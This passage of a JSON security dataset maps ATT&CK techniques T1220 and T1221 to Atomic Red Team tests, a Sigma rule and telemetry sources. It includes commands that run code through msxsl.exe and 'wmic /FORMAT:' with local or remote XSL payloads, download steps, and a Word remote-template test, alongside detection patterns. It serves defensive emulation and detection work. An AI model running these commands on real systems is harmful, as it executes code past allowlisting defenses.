(e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "http://www.group-ib.com/files/Anunak_APT_against_financial_institutions.pdf", + "https://www.group-ib.com/blog/cobalt", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1220", + "command_list": [ + "#{msxsl_exe} PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml #{xslfile}\n", + "#{msxsl_exe} #{xmlfile} PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl\n", + "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe #{xmlfile} #{xslfile}\n", + "#{msxsl_exe} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml #{xslfile}\n", + "#{msxsl_exe} #{xmlfile} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\n", + "wmic process list /FORMAT:\"#{local_xsl_file}\"\n", + "wmic #{wmic_command} /FORMAT:\"PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl\"\n", + "wmic #{wmic_command} /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"\n", + "wmic process list /FORMAT:\"#{remote_xsl_file}\"\n", + "msxsl.exe", + "wmic.exeprocess|list|/FORMAT|.xsl", + "wmic.exeos|get|/FORMAT|.xsl" + ], + "commands": [ + { + "command": "#{msxsl_exe} PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} #{xmlfile} PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe #{xmlfile} #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml #{xslfile}\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "#{msxsl_exe} #{xmlfile} https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic process list /FORMAT:\"#{local_xsl_file}\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic #{wmic_command} /FORMAT:\"PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic #{wmic_command} /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "wmic process list /FORMAT:\"#{remote_xsl_file}\"\n", + "source": "atomics/T1220/T1220.yaml", + "name": "Atomic Red Team Test - XSL Script Processing" + }, + { + "command": "msxsl.exe", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + }, + { + "command": "wmic.exeprocess|list|/FORMAT|.xsl", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + }, + { + "command": "wmic.exeos|get|/FORMAT|.xsl", + "source": "SysmonHunter - XSL Script Processing", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1220", + "display_name": "XSL Script Processing", + "atomic_tests": [ + { + "name": "MSXSL Bypass using local files", + "auto_generated_guid": "ca23bfb2-023f-49c5-8802-e66997de462d", + "description": "Executes the code specified within a XSL script tag during XSL transformation using a local payload. \nRequires download of MSXSL. No longer available from Microsoft.\n(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 ) \nOpen Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xmlfile": { + "description": "Location of the test XML file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\msxslxmlfile.xml" + }, + "xslfile": { + "description": "Location of the test XSL script file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\msxslscript.xsl" + }, + "msxsl_exe": { + "description": "Location of the MSXSL executable.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "XML file must exist on disk at specified location (#{xmlfile})\n", + "prereq_command": "if (Test-Path #{xmlfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml\" -OutFile \"#{xmlfile}\"\n" + }, + { + "description": "XSL file must exist on disk at specified location (#{xslfile})\n", + "prereq_command": "if (Test-Path #{xslfile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl\" -OutFile \"#{xslfile}\"\n" + }, + { + "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", + "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" + } + ], + "executor": { + "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", + "cleanup_command": "del #{msxsl_exe} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "MSXSL Bypass using remote files", + "auto_generated_guid": "a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985", + "description": "Executes the code specified within a XSL script tag during XSL transformation using a remote payload.\nRequires download of MSXSL.exe. No longer available from Microsoft.\n(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )\nOpen Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xmlfile": { + "description": "Remote location (URL) of the test XML file.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml" + }, + "xslfile": { + "description": "Remote location (URL) of the test XSL script file.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" + }, + "msxsl_exe": { + "description": "Location of the MSXSL executable.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\bin\\msxsl.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", + "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" + } + ], + "executor": { + "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", + "cleanup_command": "del -Path #{msxsl_exe} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "WMIC bypass using local XSL file", + "auto_generated_guid": "1b237334-3e21-4a0c-8178-b8c996124988", + "description": "Executes the code specified within a XSL script using a local payload.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "wmic_command": { + "description": "WMI command to execute using wmic.exe", + "type": "String", + "default": "process list" + }, + "local_xsl_file": { + "description": "Location of the test XSL script file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1220\\src\\wmicscript.xsl" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "XSL file must exist on disk at specified location (#{local_xsl_file})\n", + "prereq_command": "if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl\" -OutFile \"#{local_xsl_file}\"\n" + } + ], + "executor": { + "command": "wmic #{wmic_command} /FORMAT:\"#{local_xsl_file}\"\n", + "name": "command_prompt" + } + }, + { + "name": "WMIC bypass using remote XSL file", + "auto_generated_guid": "7f5be499-33be-4129-a560-66021f379b9b", + "description": "Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_xsl_file": { + "description": "Remote location of an XSL payload.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl" + }, + "wmic_command": { + "description": "WMI command to execute using wmic.exe", + "type": "String", + "default": "process list" + } + }, + "executor": { + "command": "wmic #{wmic_command} /FORMAT:\"#{remote_xsl_file}\"\n", + "name": "command_prompt" + } + } + ] + }, + { + "name": "XSL Script Processing", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "msxsl.exe" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wmic.exe" + }, + "cmdline": { + "pattern": "process|list|/FORMAT|.xsl", + "op": "and" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "wmic.exe" + }, + "cmdline": { + "pattern": "os|get|/FORMAT|.xsl", + "op": "and" + } + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "experimental", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files, rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": [ + { + "Image|endswith": "\\wmic.exe", + "CommandLine|contains": "/format" + }, + { + "Image|endswith": "\\msxsl.exe" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment", + "msxsl.exe is not installed by default so unlikely." + ], + "level": "medium", + "tags": [ + "attack.execution", + "attack.t1220" + ] + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1221", + "command_list": [ + "start PathToAtomicsFolder\\T1221\\src\\Calculator.docx\n" + ], + "commands": [ + { + "command": "start PathToAtomicsFolder\\T1221\\src\\Calculator.docx\n", + "source": "atomics/T1221/T1221.yaml", + "name": "Atomic Red Team Test - Template Injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1221", + "display_name": "Template Injection", + "atomic_tests": [ + { + "name": "WINWORD Remote Template Injection", + "auto_generated_guid": "1489e08a-82c7-44ee-b769-51b72d03521d", + "description": "Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm \nExecutes the code specified within the .dotm template.\nRequires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx. \nDefault docs file opens Calculator.exe when test sucessfully executed, while AV turned off.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "docx_file": { + "description": "Location of the test docx file on the local filesystem.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1221\\src\\Calculator.docx" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "", + "prereq_command": "", + "get_prereq_command": "" + } + ], + "executor": { + "command": "start #{docx_file}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as 